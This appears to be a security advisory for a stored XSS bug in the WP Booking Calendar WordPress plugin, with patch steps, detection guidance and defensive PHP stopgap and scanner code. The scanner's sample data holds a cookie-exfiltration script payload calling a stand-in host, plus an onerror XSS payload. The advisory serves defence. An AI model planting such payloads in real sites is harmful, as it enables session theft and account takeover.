CVE-2024-10893
📋 TL;DR
The WP Booking Calendar WordPress plugin, in versions before 10.6.5, does not sanitise or escape some of its settings. A user with administrator-level access can save JavaScript into those settings, and the script runs in the browser of any user who later loads the page where the setting is displayed (stored XSS). The bug matters because it works even when the unfiltered_html capability is disallowed, which is the default for site administrators in a multisite network: a per-site admin who is not supposed to be able to post raw HTML can still plant a script that executes in a super admin's session.
💻 Affected Systems
- WP Booking Calendar WordPress plugin (versions before 10.6.5)
📦 What is this software?
Wp Booking Calendar by Wpbookingcalendar
⚠️ Risk & Real-World Impact
Worst Case
In a multisite network, a site administrator (who lacks unfiltered_html by default) plants a script that runs when a super admin opens the affected settings page, and uses that session to take over the whole network. On a single site the script can steal other administrators' session cookies or credentials, issue authenticated admin requests (for example to create a backdoor user), and, if the affected setting is also rendered on public pages, redirect visitors or serve them malware.
Likely Case
A rogue or compromised administrator account stores JavaScript that steals session cookies from other privileged users or redirects them to a phishing page. Because admin access is required up front, this is a persistence or escalation primitive after a compromise (or an insider's tool), not an initial way in.
If Mitigated
With administrator accounts limited to trusted, monitored people and a Content Security Policy that blocks inline script on admin pages, the impact is limited to data leakage from users who view the affected settings pages.
🎯 Exploit Status
Exploitation requires an authenticated account with administrator-level access to the plugin's settings page. The attacker saves a JavaScript payload into an unsanitised settings field, and it runs the next time the settings page (or any page that echoes that setting) is loaded by another user.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 10.6.5
Vendor Advisory: https://wpscan.com/vulnerability/a230a552-3fda-4145-810f-58af540107db/
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins > Installed Plugins.
3. Find WP Booking Calendar.
4. Click 'Update Now' if an update is available.
5. If a manual update is needed, download version 10.6.5 or later from WordPress.org and replace the plugin files.
🔧 Temporary Workarounds
Remove vulnerable plugin
Temporarily disable or remove the WP Booking Calendar plugin until it can be updated. The slug in the commands below is the one given on this page; confirm it with wp plugin list before running them. Note that wp plugin delete removes the files without running the plugin's uninstall routine, so any script already stored in its settings stays in wp_options until you clean it.
wp plugin deactivate wp-booking-calendar
wp plugin delete wp-booking-calendar
Restrict admin access
Limit administrator-level access to trusted users, enforce MFA on those accounts, and monitor changes to plugin settings. In a multisite network, per-site administrators can exploit this even though they lack unfiltered_html, so review them as well as super admins.
🧯 If You Can't Patch
- Deploy a Content Security Policy that disallows inline script on the affected pages. WordPress admin screens depend heavily on inline scripts, so a strict policy for wp-admin needs nonces or hashes and careful testing; start with Content-Security-Policy-Report-Only.
- Add web application firewall rules that block common XSS payloads (script tags, on* event attributes, javascript: URLs) in POSTs to the plugin's settings page. Treat this as raising the bar, not closing the hole: request-body filters are routinely bypassed with encoding tricks.
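The bug class behind this advisory and a stopgap for sites that cannot update yet, as an added example that is not code from WP Booking Calendar or from this page. It is a WordPress must-use plugin (put it in wp-content/mu-plugins on a test site first). The example_booking setting names and EXAMPLE_OPTION_PREFIX are assumptions for illustration; the plugin's real option names are not given here and must be read from wp option list on the affected site.

```php
<?php
/**
 * Plugin Name: Settings XSS stopgap (added example, not part of WP Booking Calendar)
 *
 * Shows (1) why a settings field can carry stored XSS past the unfiltered_html
 * check, (2) the correct sanitize-on-save / escape-on-output pattern, and
 * (3) a pre_update_option filter that imposes the same rule on an unpatched
 * third-party plugin. All option names here are ASSUMPTIONS for illustration.
 */

// --- (1) The bug class ----------------------------------------------------
// A handler that stores whatever was submitted and echoes it back unescaped
// lets a user WITHOUT unfiltered_html (a per-site admin in multisite) persist
// <script> that later runs in every other admin's browser:
//
//   update_option( 'example_booking_title', $_POST['title'] );               // no kses
//   echo '<input value="' . get_option( 'example_booking_title' ) . '">';    // no esc_attr
//
// Core does not sanitise arbitrary options; the plugin must do it.

// --- (2) Correct pattern for a plugin's own setting -----------------------
function example_booking_sanitize_title( $value ) {
    $value = (string) $value;
    // Users allowed to post raw HTML keep that privilege; everyone else is
    // limited to the wp_kses_post allowlist, which drops <script>, on*
    // handlers and javascript: URLs. This is the same rule core applies to posts.
    if ( ! current_user_can( 'unfiltered_html' ) ) {
        $value = wp_kses_post( $value );
    }
    return $value;
}

add_action( 'admin_init', function () {
    register_setting( 'example_booking', 'example_booking_title', array(
        'type'              => 'string',
        'sanitize_callback' => 'example_booking_sanitize_title',
    ) );
} );

function example_booking_render_title_field() {
    // Escape on output regardless of what is stored: kses is an allowlist,
    // not an attribute-context encoder.
    printf(
        '<input type="text" name="example_booking_title" value="%s">',
        esc_attr( get_option( 'example_booking_title', '' ) )
    );
}

// --- (3) Stopgap for an unpatched third-party plugin ----------------------
// Apply the kses rule to every option whose name starts with an assumed
// prefix, before it is written. Set the prefix after inspecting
// `wp option list --search='booking*'` on the affected site.
const EXAMPLE_OPTION_PREFIX = 'booking_';

function example_kses_deep( $value ) {
    // Settings are often stored as (serialized) arrays; walk them recursively.
    if ( is_array( $value ) ) {
        return array_map( 'example_kses_deep', $value );
    }
    return is_string( $value ) ? wp_kses_post( $value ) : $value;
}

add_filter( 'pre_update_option', function ( $value, $option, $old_value ) {
    if ( 0 !== strpos( $option, EXAMPLE_OPTION_PREFIX ) ) {
        return $value;
    }
    if ( current_user_can( 'unfiltered_html' ) ) {
        return $value;
    }
    return example_kses_deep( $value );
}, 10, 3 );
```

The filter only covers writes that go through update_option (which the Settings API uses); values written by WP-CLI or direct SQL bypass it, and it does nothing for payloads already stored or for the plugin's missing output escaping, so it is a stopgap until 10.6.5 is installed. In cron or CLI contexts current_user_can returns false, so the filter errs on the side of sanitising.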
🔍 How to Verify
Check if Vulnerable:
Any version before 10.6.5 is vulnerable. Check the plugin version in the WordPress admin under Plugins > Installed Plugins, or with WP-CLI as below (if the command reports no such plugin, confirm the slug with wp plugin list).
Check Version:
wp plugin get wp-booking-calendar --field=version
Verify Fix Applied:
Confirm the installed version is 10.6.5 or higher, comparing versions component by component (10.10.0 is newer than 10.6.5 even though it sorts lower as a string). After updating, review and re-save the plugin's settings: a payload stored before the update may still sit in wp_options, since updating the code does not rewrite existing option values.
📡 Detection & Monitoring
Log Indicators:
- An administrator account modifying plugin settings at an unusual time, from an unusual IP address, or shortly after a password reset
- Script markers (<script, on*= attributes, javascript: URLs) in option update events or in the plugin's rows in wp_options
Network Indicators:
- Requests from administrators' browsers to unfamiliar external hosts while they are on wp-admin pages (cookie or token exfiltration)
- Script or image loads from third-party domains triggered by the plugin's settings pages
SIEM Query (illustrative: field names depend on your WordPress audit-log source, and the version test must be version-aware, since a plain string comparison ranks 10.10.x below 10.6.5):
source="wordpress" AND (event="plugin_updated" OR event="option_updated") AND plugin="wp-booking-calendar" AND version<"10.6.5"
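A stand-alone PHP triage script, added here as an example (not from this advisory or from the plugin), that applies the log indicators above to a dump of wp_options and performs the version test correctly. The option names in the embedded sample are constructed; on a real site feed it the output of wp option list --format=json.

```php
<?php
/**
 * Added example: scan a wp_options dump for stored-script markers and flag a
 * vulnerable plugin version. Runs stand-alone: php scan_options.php
 * Real data: wp option list --format=json > options.json, then
 *            scan_options( json_decode( file_get_contents( 'options.json' ), true ), 'booking_' )
 * The option names and values below are CONSTRUCTED sample data.
 */

const FIXED_VERSION = '10.6.5';

/** Version-aware test; a string compare would call 10.10.0 older than 10.6.5. */
function is_vulnerable_version( string $installed ): bool {
    return version_compare( $installed, FIXED_VERSION, '<' );
}

/** Markers that should not appear in a setting saved by a user without unfiltered_html. */
function script_markers(): array {
    return array(
        'script_tag'    => '/<\s*script\b/i',
        'event_handler' => '/\bon[a-z]+\s*=/i',
        'js_url'        => '/\bjavascript\s*:/i',
        'svg_or_iframe' => '/<\s*(svg|iframe|object|embed)\b/i',
    );
}

/**
 * Walks an option value (plain string, serialized array, or nested array)
 * and returns the names of the markers that matched.
 */
function find_markers( $value ): array {
    $hits = array();
    if ( is_string( $value ) ) {
        // WordPress stores array settings serialized; unwrap without instantiating objects.
        $unser = @unserialize( $value, array( 'allowed_classes' => false ) );
        if ( false !== $unser && is_array( $unser ) ) {
            return find_markers( $unser );
        }
        foreach ( script_markers() as $name => $re ) {
            if ( preg_match( $re, $value ) ) {
                $hits[] = $name;
            }
        }
    } elseif ( is_array( $value ) ) {
        foreach ( $value as $v ) {
            $hits = array_merge( $hits, find_markers( $v ) );
        }
    }
    return array_values( array_unique( $hits ) );
}

/** Returns option_name => matched markers for every suspicious option under $prefix. */
function scan_options( array $options, string $prefix = '' ): array {
    $findings = array();
    foreach ( $options as $row ) {
        if ( '' !== $prefix && 0 !== strpos( $row['option_name'], $prefix ) ) {
            continue;
        }
        $hits = find_markers( $row['option_value'] );
        if ( $hits ) {
            $findings[ $row['option_name'] ] = $hits;
        }
    }
    return $findings;
}

// Constructed sample in the shape of `wp option list --format=json` output.
$sample = array(
    array( 'option_name' => 'booking_title',  'option_value' => 'Book a room' ),
    array( 'option_name' => 'booking_footer', 'option_value' => 'Thanks!<script>fetch("//evil.test/?c="+document.cookie)</script>' ),
    array( 'option_name' => 'booking_form',   'option_value' => serialize( array( 'label' => '<img src=x onerror=alert(1)>' ) ) ),
    array( 'option_name' => 'siteurl',        'option_value' => 'https://example.test' ),
);

foreach ( scan_options( $sample, 'booking_' ) as $name => $hits ) {
    printf( "%-16s %s\n", $name, implode( ',', $hits ) );
}
printf( "version 10.6.4 vulnerable: %s\n", is_vulnerable_version( '10.6.4' ) ? 'yes' : 'no' );
printf( "version 10.10.0 vulnerable: %s\n", is_vulnerable_version( '10.10.0' ) ? 'yes' : 'no' );
```

The regexes are a triage heuristic, not a parser: an administrator who legitimately holds unfiltered_html may have saved HTML that trips them, so pair each finding with the audit-log record of who last saved that option and whether that user had the capability at the time.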